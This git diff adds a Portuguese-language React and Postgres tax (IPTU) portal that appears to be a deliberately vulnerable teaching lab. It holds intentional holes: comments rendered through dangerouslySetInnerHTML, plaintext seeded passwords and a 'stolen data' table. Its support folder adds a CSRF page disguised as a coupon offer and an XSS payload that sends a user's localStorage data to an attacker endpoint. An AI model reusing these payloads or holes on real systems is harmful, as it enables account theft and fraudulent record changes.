+        <div style={{ marginBottom: "20px" }}>
+          <h3>Adicionar Coment├írio</h3>
+
+          <textarea
+            value={novoComentario}
+            onChange={(e) => setNovoComentario(e.target.value)}
+            placeholder="Digite seu coment├írio..."
+            style={{
+              width: "100%",
+              height: "80px",
+              padding: "10px",
+              marginBottom: "10px",
+            }}
+          />
+
+          <button onClick={enviarComentario}>
+            Enviar Coment├írio
+          </button>
+        </div>
+        <ul>
+          {comentarios.map((comentario, index) => (
+            <li key={index}>
+              <div
+                dangerouslySetInnerHTML={{
+                  __html: `
+                  <strong>Usu├írio:</strong> ${comentario.usuario_id}
+                  <br/>
+                  <strong>Mensagem:</strong> ${comentario.texto}
+                `,
+                }}
+              />
+            </li>
+          ))}
+        </ul>
+      </div>
+    </div>
+
+  );
+}
+
+const styles = {
+  container: {
+    padding: "40px",
+    fontFamily: "Arial",
+  },
+  header: {
+    display: "flex",
+    justifyContent: "space-between",
+    alignItems: "center",
+  },
+  card: {
+    marginTop: "40px",
+    padding: "20px",
+    border: "1px solid #ccc",
+    borderRadius: "8px",
+    width: "300px",
+  },
+  dropdown: {
+    position: "absolute" as const,
+    top: "40px",
+    right: 0,
+    background: "white",
+    border: "1px solid #ccc",
+    display: "flex",
+    flexDirection: "column" as const,
+    padding: "10px",
+    gap: "5px",
+  },
+};
+
+export default Dashboard;
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/Login.tsx b/IPTU Piraporatuba do Sul/frontend/src/Login.tsx
new file mode 100644
index 0000000..a0fa2bd
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/Login.tsx	
@@ -0,0 +1,143 @@
+import { useState } from "react";
+import axios from "axios";
+import { useNavigate } from "react-router-dom";
+
+function Login() {
+    const navigate = useNavigate();
+    const [isRegistering, setIsRegistering] = useState(false);
+
+    const [email, setEmail] = useState("");
+    const [password, setPassword] = useState("");
+    const [nome, setNome] = useState("");
+    const [message, setMessage] = useState("");
+
+    const handleLogin = async (e: React.FormEvent) => {
+        e.preventDefault();
+
+        try {
+            const response = await axios.post(
+                "http://localhost:3001/usuario/login",
+                { email, password }
+            );
+            const user = response.data.user;
+
+            // salvando no localStorage
+            localStorage.setItem("user", JSON.stringify(user));
+
+            navigate("/dashboard");
+        } catch {
+            setMessage("Erro no login");
+        }
+    };
+
+    const handleRegister = async (e: React.FormEvent) => {
+        e.preventDefault();
+
+        try {
+            const response = await axios.post(
+                "http://localhost:3001/usuario/novo-login",
+                { email, password, nome }
+            );
+            if (response.data.success) {
+                setMessage("Usu├írio criado com sucesso!");
+                setIsRegistering(false);
+            }
+        } catch {
+            setMessage("Erro no cadastro");
+        }
+    };
+
+    return (
+        <div style={styles.container}>
+            <h1>{isRegistering ? "Criar Conta" : "Login"}</h1>
+
+            <form
+                onSubmit={isRegistering ? handleRegister : handleLogin}
+                style={styles.form}
+            >
+                {isRegistering && (
+                    <input
+                        type="text"
+                        placeholder="Nome Completo"
+                        value={nome}
+                        onChange={(e) => setNome(e.target.value)}
+                        style={styles.input}
+                        required
+                    />
+                )}
+
+                <input
+                    type="text"
+                    placeholder="E-mail"
+                    value={email}
+                    onChange={(e) => setEmail(e.target.value)}
+                    style={styles.input}
+                    required
+                />
+
+                <input
+                    type="password"
+                    placeholder="Senha"
+                    value={password}
+                    onChange={(e) => setPassword(e.target.value)}
+                    style={styles.input}
+                    required
+                />
+
+                <button type="submit" style={styles.button}>
+                    {isRegistering ? "Cadastrar" : "Entrar"}
+                </button>
+            </form>
+
+            <p style={{ marginTop: 10 }}>{message}</p>
+
+            <button
+                onClick={() => {
+                    setMessage("");
+                    setIsRegistering(!isRegistering);
+                }}
+                style={styles.linkButton}
+            >
+                {isRegistering
+                    ? "J├í tem conta? Fazer login"
+                    : "N├úo tem conta? Criar uma"}
+            </button>
+        </div>
+    );
+}
+
+const styles = {
+    container: {
+        display: "flex",
+        flexDirection: "column" as const,
+        alignItems: "center",
+        justifyContent: "center",
+        height: "100vh",
+        fontFamily: "Arial",
+    },
+    form: {
+        display: "flex",
+        flexDirection: "column" as const,
+        width: "320px",
+    },
+    input: {
+        marginBottom: "10px",
+        padding: "8px",
+        fontSize: "16px",
+    },
+    button: {
+        padding: "10px",
+        fontSize: "16px",
+        cursor: "pointer",
+    },
+    linkButton: {
+        marginTop: "15px",
+        background: "none",
+        border: "none",
+        color: "blue",
+        cursor: "pointer",
+        textDecoration: "underline",
+    },
+};
+
+export default Login;
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/Tipos/Comentario.ts b/IPTU Piraporatuba do Sul/frontend/src/Tipos/Comentario.ts
new file mode 100644
index 0000000..9222733
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/Tipos/Comentario.ts	
@@ -0,0 +1,4 @@
+export type Comentario = {
+  texto: string;
+  usuario_id: number;
+};
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/Tipos/Iptu.ts b/IPTU Piraporatuba do Sul/frontend/src/Tipos/Iptu.ts
new file mode 100644
index 0000000..40ba5b4
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/Tipos/Iptu.ts	
@@ -0,0 +1,4 @@
+export type Iptu = {
+  valor: number;
+  // pago: boolean;
+};
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/Tipos/Iptuu.ts b/IPTU Piraporatuba do Sul/frontend/src/Tipos/Iptuu.ts
new file mode 100644
index 0000000..2e2a0ef
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/Tipos/Iptuu.ts	
@@ -0,0 +1,7 @@
+export type Iptuu = {
+  valor: number;
+  id: number;
+  usuario_id: number;
+  nome: string;
+  // pago: boolean;
+};
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/assets/react.svg b/IPTU Piraporatuba do Sul/frontend/src/assets/react.svg
new file mode 100644
index 0000000..6c87de9
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/assets/react.svg	
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="iconify iconify--logos" width="35.93" height="32" preserveAspectRatio="xMidYMid meet" viewBox="0 0 256 228"><path fill="#00D8FF" d="M210.483 73.824a171.49 171.49 0 0 0-8.24-2.597c.465-1.9.893-3.777 1.273-5.621c6.238-30.281 2.16-54.676-11.769-62.708c-13.355-7.7-35.196.329-57.254 19.526a171.23 171.23 0 0 0-6.375 5.848a155.866 155.866 0 0 0-4.241-3.917C100.759 3.829 77.587-4.822 63.673 3.233C50.33 10.957 46.379 33.89 51.995 62.588a170.974 170.974 0 0 0 1.892 8.48c-3.28.932-6.445 1.924-9.474 2.98C17.309 83.498 0 98.307 0 113.668c0 15.865 18.582 31.778 46.812 41.427a145.52 145.52 0 0 0 6.921 2.165a167.467 167.467 0 0 0-2.01 9.138c-5.354 28.2-1.173 50.591 12.134 58.266c13.744 7.926 36.812-.22 59.273-19.855a145.567 145.567 0 0 0 5.342-4.923a168.064 168.064 0 0 0 6.92 6.314c21.758 18.722 43.246 26.282 56.54 18.586c13.731-7.949 18.194-32.003 12.4-61.268a145.016 145.016 0 0 0-1.535-6.842c1.62-.48 3.21-.974 4.76-1.488c29.348-9.723 48.443-25.443 48.443-41.52c0-15.417-17.868-30.326-45.517-39.844Zm-6.365 70.984c-1.4.463-2.836.91-4.3 1.345c-3.24-10.257-7.612-21.163-12.963-32.432c5.106-11 9.31-21.767 12.459-31.957c2.619.758 5.16 1.557 7.61 2.4c23.69 8.156 38.14 20.213 38.14 29.504c0 9.896-15.606 22.743-40.946 31.14Zm-10.514 20.834c2.562 12.94 2.927 24.64 1.23 33.787c-1.524 8.219-4.59 13.698-8.382 15.893c-8.067 4.67-25.32-1.4-43.927-17.412a156.726 156.726 0 0 1-6.437-5.87c7.214-7.889 14.423-17.06 21.459-27.246c12.376-1.098 24.068-2.894 34.671-5.345a134.17 134.17 0 0 1 1.386 6.193ZM87.276 214.515c-7.882 2.783-14.16 2.863-17.955.675c-8.075-4.657-11.432-22.636-6.853-46.752a156.923 156.923 0 0 1 1.869-8.499c10.486 2.32 22.093 3.988 34.498 4.994c7.084 9.967 14.501 19.128 21.976 27.15a134.668 134.668 0 0 1-4.877 4.492c-9.933 8.682-19.886 14.842-28.658 17.94ZM50.35 144.747c-12.483-4.267-22.792-9.812-29.858-15.863c-6.35-5.437-9.555-10.836-9.555-15.216c0-9.322 13.897-21.212 37.076-29.293c2.813-.98 5.757-1.905 8.812-2.773c3.204 10.42 7.406 21.315 12.477 32.332c-5.137 11.18-9.399 22.249-12.634 32.792a134.718 134.718 0 0 1-6.318-1.979Zm12.378-84.26c-4.811-24.587-1.616-43.134 6.425-47.789c8.564-4.958 27.502 2.111 47.463 19.835a144.318 144.318 0 0 1 3.841 3.545c-7.438 7.987-14.787 17.08-21.808 26.988c-12.04 1.116-23.565 2.908-34.161 5.309a160.342 160.342 0 0 1-1.76-7.887Zm110.427 27.268a347.8 347.8 0 0 0-7.785-12.803c8.168 1.033 15.994 2.404 23.343 4.08c-2.206 7.072-4.956 14.465-8.193 22.045a381.151 381.151 0 0 0-7.365-13.322Zm-45.032-43.861c5.044 5.465 10.096 11.566 15.065 18.186a322.04 322.04 0 0 0-30.257-.006c4.974-6.559 10.069-12.652 15.192-18.18ZM82.802 87.83a323.167 323.167 0 0 0-7.227 13.238c-3.184-7.553-5.909-14.98-8.134-22.152c7.304-1.634 15.093-2.97 23.209-3.984a321.524 321.524 0 0 0-7.848 12.897Zm8.081 65.352c-8.385-.936-16.291-2.203-23.593-3.793c2.26-7.3 5.045-14.885 8.298-22.6a321.187 321.187 0 0 0 7.257 13.246c2.594 4.48 5.28 8.868 8.038 13.147Zm37.542 31.03c-5.184-5.592-10.354-11.779-15.403-18.433c4.902.192 9.899.29 14.978.29c5.218 0 10.376-.117 15.453-.343c-4.985 6.774-10.018 12.97-15.028 18.486Zm52.198-57.817c3.422 7.8 6.306 15.345 8.596 22.52c-7.422 1.694-15.436 3.058-23.88 4.071a382.417 382.417 0 0 0 7.859-13.026a347.403 347.403 0 0 0 7.425-13.565Zm-16.898 8.101a358.557 358.557 0 0 1-12.281 19.815a329.4 329.4 0 0 1-23.444.823c-7.967 0-15.716-.248-23.178-.732a310.202 310.202 0 0 1-12.513-19.846h.001a307.41 307.41 0 0 1-10.923-20.627a310.278 310.278 0 0 1 10.89-20.637l-.001.001a307.318 307.318 0 0 1 12.413-19.761c7.613-.576 15.42-.876 23.31-.876H128c7.926 0 15.743.303 23.354.883a329.357 329.357 0 0 1 12.335 19.695a358.489 358.489 0 0 1 11.036 20.54a329.472 329.472 0 0 1-11 20.722Zm22.56-122.124c8.572 4.944 11.906 24.881 6.52 51.026c-.344 1.668-.73 3.367-1.15 5.09c-10.622-2.452-22.155-4.275-34.23-5.408c-7.034-10.017-14.323-19.124-21.64-27.008a160.789 160.789 0 0 1 5.888-5.4c18.9-16.447 36.564-22.941 44.612-18.3ZM128 90.808c12.625 0 22.86 10.235 22.86 22.86s-10.235 22.86-22.86 22.86s-22.86-10.235-22.86-22.86s10.235-22.86 22.86-22.86Z"></path></svg>
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/index.css b/IPTU Piraporatuba do Sul/frontend/src/index.css
new file mode 100644
index 0000000..08a3ac9
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/index.css	
@@ -0,0 +1,68 @@
+:root {
+  font-family: system-ui, Avenir, Helvetica, Arial, sans-serif;
+  line-height: 1.5;
+  font-weight: 400;
+
+  color-scheme: light dark;
+  color: rgba(255, 255, 255, 0.87);
+  background-color: #242424;
+
+  font-synthesis: none;
+  text-rendering: optimizeLegibility;
+  -webkit-font-smoothing: antialiased;
+  -moz-osx-font-smoothing: grayscale;
+}
+
+a {
+  font-weight: 500;
+  color: #646cff;
+  text-decoration: inherit;
+}
+a:hover {
+  color: #535bf2;
+}
+
+body {
+  margin: 0;
+  display: flex;
+  place-items: center;
+  min-width: 320px;
+  min-height: 100vh;
+}
+
+h1 {
+  font-size: 3.2em;
+  line-height: 1.1;
+}
+
+button {
+  border-radius: 8px;
+  border: 1px solid transparent;
+  padding: 0.6em 1.2em;
+  font-size: 1em;
+  font-weight: 500;
+  font-family: inherit;
+  background-color: #1a1a1a;
+  cursor: pointer;
+  transition: border-color 0.25s;
+}
+button:hover {
+  border-color: #646cff;
+}
+button:focus,
+button:focus-visible {
+  outline: 4px auto -webkit-focus-ring-color;
+}
+
+@media (prefers-color-scheme: light) {
+  :root {
+    color: #213547;
+    background-color: #ffffff;
+  }
+  a:hover {
+    color: #747bff;
+  }
+  button {
+    background-color: #f9f9f9;
+  }
+}
diff --git a/IPTU Piraporatuba do Sul/frontend/src/main.tsx b/IPTU Piraporatuba do Sul/frontend/src/main.tsx
new file mode 100644
index 0000000..acd432c
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/main.tsx	
@@ -0,0 +1,13 @@
+import { StrictMode } from "react";
+import { createRoot } from "react-dom/client";
+import { BrowserRouter } from "react-router-dom";
+import "./index.css";
+import App from "./App.tsx";
+
+createRoot(document.getElementById("root")!).render(
+  <StrictMode>
+    <BrowserRouter>
+      <App />
+    </BrowserRouter>
+  </StrictMode>
+);
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/tsconfig.app.json b/IPTU Piraporatuba do Sul/frontend/tsconfig.app.json
new file mode 100644
index 0000000..a9b5a59
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/tsconfig.app.json	
@@ -0,0 +1,28 @@
+{
+  "compilerOptions": {
+    "tsBuildInfoFile": "./node_modules/.tmp/tsconfig.app.tsbuildinfo",
+    "target": "ES2022",
+    "useDefineForClassFields": true,
+    "lib": ["ES2022", "DOM", "DOM.Iterable"],
+    "module": "ESNext",
+    "types": ["vite/client"],
+    "skipLibCheck": true,
+
+    /* Bundler mode */
+    "moduleResolution": "bundler",
+    "allowImportingTsExtensions": true,
+    "verbatimModuleSyntax": true,
+    "moduleDetection": "force",
+    "noEmit": true,
+    "jsx": "react-jsx",
+
+    /* Linting */
+    "strict": true,
+    "noUnusedLocals": true,
+    "noUnusedParameters": true,
+    "erasableSyntaxOnly": true,
+    "noFallthroughCasesInSwitch": true,
+    "noUncheckedSideEffectImports": true
+  },
+  "include": ["src"]
+}
diff --git a/IPTU Piraporatuba do Sul/frontend/tsconfig.json b/IPTU Piraporatuba do Sul/frontend/tsconfig.json
new file mode 100644
index 0000000..1ffef60
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/tsconfig.json	
@@ -0,0 +1,7 @@
+{
+  "files": [],
+  "references": [
+    { "path": "./tsconfig.app.json" },
+    { "path": "./tsconfig.node.json" }
+  ]
+}
diff --git a/IPTU Piraporatuba do Sul/frontend/tsconfig.node.json b/IPTU Piraporatuba do Sul/frontend/tsconfig.node.json
new file mode 100644
index 0000000..8a67f62
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/tsconfig.node.json	
@@ -0,0 +1,26 @@
+{
+  "compilerOptions": {
+    "tsBuildInfoFile": "./node_modules/.tmp/tsconfig.node.tsbuildinfo",
+    "target": "ES2023",
+    "lib": ["ES2023"],
+    "module": "ESNext",
+    "types": ["node"],
+    "skipLibCheck": true,
+
+    /* Bundler mode */
+    "moduleResolution": "bundler",
+    "allowImportingTsExtensions": true,
+    "verbatimModuleSyntax": true,
+    "moduleDetection": "force",
+    "noEmit": true,
+
+    /* Linting */
+    "strict": true,
+    "noUnusedLocals": true,
+    "noUnusedParameters": true,
+    "erasableSyntaxOnly": true,
+    "noFallthroughCasesInSwitch": true,
+    "noUncheckedSideEffectImports": true
+  },
+  "include": ["vite.config.ts"]
+}
diff --git a/IPTU Piraporatuba do Sul/frontend/vite.config.ts b/IPTU Piraporatuba do Sul/frontend/vite.config.ts
new file mode 100644
index 0000000..4efe189
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/vite.config.ts	
@@ -0,0 +1,13 @@
+import { defineConfig } from 'vite'
+import react from '@vitejs/plugin-react'
+
+// https://vite.dev/config/
+export default defineConfig({
+  plugins: [
+    react({
+      babel: {
+        plugins: [['babel-plugin-react-compiler']],
+      },
+    }),
+  ],
+})
diff --git a/IPTU Piraporatuba do Sul/package.json b/IPTU Piraporatuba do Sul/package.json
new file mode 100644
index 0000000..39a621c
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/package.json	
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "xss": "^1.0.15"
+  }
+}
diff --git a/IPTU Piraporatuba do Sul/postgres/init.sql b/IPTU Piraporatuba do Sul/postgres/init.sql
new file mode 100644
index 0000000..3143440
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/postgres/init.sql	
@@ -0,0 +1,90 @@
+CREATE TABLE IF NOT EXISTS tipo_usuario (
+    id SERIAL PRIMARY KEY,
+    tipo VARCHAR(100)
+);
+INSERT INTO tipo_usuario (tipo)
+VALUES
+('Admin'),
+('Gerente'),
+('Municipe');
+
+CREATE TABLE IF NOT EXISTS usuario (
+    id SERIAL PRIMARY KEY,
+    nome VARCHAR(100) NOT NULL,
+    senha VARCHAR(100) NOT NULL,
+    email VARCHAR(150) UNIQUE NOT NULL,
+    tipo_usuario_id INTEGER NOT NULL,
+    criado_em TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
+     CONSTRAINT fk_usuario_tipo
+        FOREIGN KEY (tipo_usuario_id)
+        REFERENCES tipo_usuario (id)
+        ON DELETE RESTRICT
+        ON UPDATE CASCADE
+);
+
+INSERT INTO usuario (nome, email, senha, tipo_usuario_id)
+VALUES 
+('Rodrigo Silva Peres', 'rodrigo@email.com', 'senha123', 1),
+('Aluno Teste', 'aluno@email.com', 'senha123', 2);
+
+CREATE TABLE IF NOT EXISTS iptu (
+    id SERIAL PRIMARY KEY,
+    usuario_id INT REFERENCES usuario(id) NULL,
+    nome VARCHAR(100),
+    valor NUMERIC(10,2)
+);
+
+INSERT INTO iptu (usuario_id, nome, valor)
+VALUES
+(null, 'ANDRE DE HOLANDA VENTURA', 1000.00),
+(null, 'ANDRE MICHEL DE CARVALHO', 1000.00),
+(null, 'BRUNA CAIADO REGRA', 1000.00),
+(null, 'BRUNO ALVES PEREIRA DOS SANTOS', 1000.00),
+(null, 'BRUNO HENRIQUE MENEZES RAMOS', 1000.00),
+(null, 'BRUNO HENRIQUE OLIVEIRA', 1000.00),
+(null, 'CLAUDIO DOS SANTOS SIQUEIRA JUNIOR', 1000.00),
+(null, 'EDLAINE DE PAULA SOUZA', 1000.00),
+(null, 'EDUARDO HENRIQUE DE SOUZA BRITO', 1000.00),
+(null, 'FELIPE FERNANDES CORREA', 1000.00),
+(null, 'GABRIEL HENRIQUE SIQUEIRA PINTO', 1000.00),
+(null, 'GABRIEL JULIANI BERNES', 1000.00),
+(null, 'LEANDRO BARBOSA CARDOSO', 1000.00),
+(null, 'LUANA PINHEIRO DOS SANTOS VENANCIO', 1000.00),
+(null, 'LUCAS ROQUE ALVIM CRUZ', 1000.00),
+(null, 'LUIZ FELIPE DOS SANTOS', 1000.00),
+(null, 'MARIA EDUARDA FERREIRA SILVA', 1000.00),
+(null, 'MAURICIO OLIVEIRA MEDEIROS CEPINHO', 1000.00),
+(null, 'NICOLAS HENRIQUE SILVA DE OLIVEIRA', 1000.00),
+(null, 'NICOLAS JOSE DE AQUINO', 1000.00),
+(null, 'PAMELA DA SILVA FREITAS', 1000.00),
+(null, 'PAULO ALEXANDRE BUENO', 1000.00),
+(null, 'PEDRO FELIPE DE ARAUJO OLIVEIRA', 1000.00),
+(null, 'POLLYANA ROBERTA DE SOUSA', 1000.00),
+(null, 'RAQUEL MASSAE NAKAMURA SIQUEIRA', 1000.00),
+(null, 'RODRIGO DE ANDRADE PAULA', 1000.00),
+(null, 'TIAGO SANTINI DA SILVA', 1000.00),
+(null, 'VICTOR HUGO DANTAS CARBAJO', 1000.00),
+(null, 'VINICIUS BARBOSA FERNANDES', 1000.00),
+(null, 'VITOR FRANCISCO DE AZEVEDO ZONZINI', 1000.00),
+(1, 'RODRIGO SILVA PERES', 10.00);
+
+
+
+CREATE TABLE IF NOT EXISTS comentario (
+    id SERIAL PRIMARY KEY,
+    texto VARCHAR(255),
+    usuario_id INTEGER NOT NULL,
+    CONSTRAINT fk_usuario_comentario
+        FOREIGN KEY (usuario_id)
+        REFERENCES usuario (id)
+        ON DELETE RESTRICT
+        ON UPDATE CASCADE
+);
+INSERT INTO comentario (texto, usuario_id) VALUES
+('Nossa pirapora ├® linda e tem uma ├│tima gest├úo.', 1),
+('Concordo chefinho!', 2);
+
+CREATE TABLE IF NOT EXISTS dados_roubados (
+    id SERIAL PRIMARY KEY,
+    dados VARCHAR(255)
+);
\ No newline at end of file
diff --git a/Material suporte/AtaqueCSRF.html b/Material suporte/AtaqueCSRF.html
new file mode 100644
index 0000000..f654bb0
--- /dev/null
+++ b/Material suporte/AtaqueCSRF.html	
@@ -0,0 +1,64 @@
+<html>
+<head>
+    <title>Cupons Imperd├¡veis</title>
+
+    <style>
+        body{
+            font-family: Arial;
+            display:flex;
+            flex-direction:column;
+            align-items:center;
+            justify-content:center;
+            height:100vh;
+            background:#f2f2f2;
+        }
+
+        .card{
+            background:white;
+            padding:40px;
+            border-radius:10px;
+            box-shadow:0 0 10px rgba(0,0,0,0.2);
+            text-align:center;
+        }
+
+        button{
+            margin-top:20px;
+            padding:15px;
+            font-size:18px;
+            cursor:pointer;
+        }
+    </style>
+</head>
+
+<body>
+
+<div class="card">
+    <h1>­ƒÄü Cupom de desconto</h1>
+    <p>Clique no bot├úo abaixo para gerar seu cupom!</p>
+
+    <button onclick="gerarCupom()">Gerar Cupom</button>
+</div>
+
+<script>
+
+function gerarCupom(){
+
+   const dados = localStorage.getItem('user');
+   fetch("http://localhost:3001/usuario/atualizar-iptu",{
+        method: "POST",
+        headers:{
+            "Content-Type": "application/json"
+        },
+        body: JSON.stringify({
+            usuarioId: 3,
+            novoValor: 1
+        })
+    });
+
+    alert("Cupom gerado com sucesso!");
+}
+
+</script>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/Material suporte/XSS.xml b/Material suporte/XSS.xml
new file mode 100644
index 0000000..e40488a
--- /dev/null
+++ b/Material suporte/XSS.xml	
@@ -0,0 +1,8 @@
+<img src=x onerror="
+  const dados = localStorage.getItem('user');
+  fetch('http://localhost:3001/hacker-malvadao/dados-roubados', {
+    method: 'POST',
+    headers: {'Content-Type':'application/json'},
+    body: JSON.stringify({dados})
+  });
+">
\ No newline at end of file
